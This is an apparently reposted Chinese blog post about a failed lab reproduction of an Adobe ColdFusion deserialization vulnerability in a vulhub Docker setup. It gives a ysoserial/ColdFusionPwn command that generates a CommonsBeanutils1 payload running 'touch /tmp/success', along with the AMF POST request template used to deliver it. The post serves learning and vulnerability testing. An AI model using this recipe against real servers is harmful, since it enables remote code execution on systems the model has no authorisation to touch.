其他分享
首页 > 其他分享> > Adobe ColdFusion 反序列化漏洞(一次失败的复现)

Adobe ColdFusion 反序列化漏洞(一次失败的复现)

作者:互联网

Adobe ColdFusion 反序列化漏洞

0x01.环境搭建

利用vulhub搭建漏洞环境

service docker start
docker-compose up -d

image-20210403225302538

查看开启的端口号

docker-compose ps

image-20210403225351031

访问http://target_ip:8500/CFIDE/administrator/index.cfm

image-20210403225516506

输入密码vulhub,即可成功安装Adobe ColdFusion

image-20210403225534492

0x02.漏洞复现

我们使用ColdFusionPwn工具来生成POC

java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'touch /tmp/success' poc.ser

我执行的时候出现了这样的错误,但kali上可以生成payload

image-20210403231159581

image-20210403231131940

使用past from file来给burp添加payload

文件头如下,要用Content-Type: application/x-amf

POST /flex2gateway/amf HTTP/1.1
Host: target_ip:8500
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-amf
Content-Length: 2853

[...poc...]

image-20210403231914212

但结果是失败的,总是无法执行命令,希望有大佬解惑

image-20210403231946298

image-20210403231956779

image-20210404105903646

标签:Adobe,ColdFusion,Accept,amf,Content,docker,序列化
来源: https://www.cnblogs.com/-Anguvia-/p/14615796.html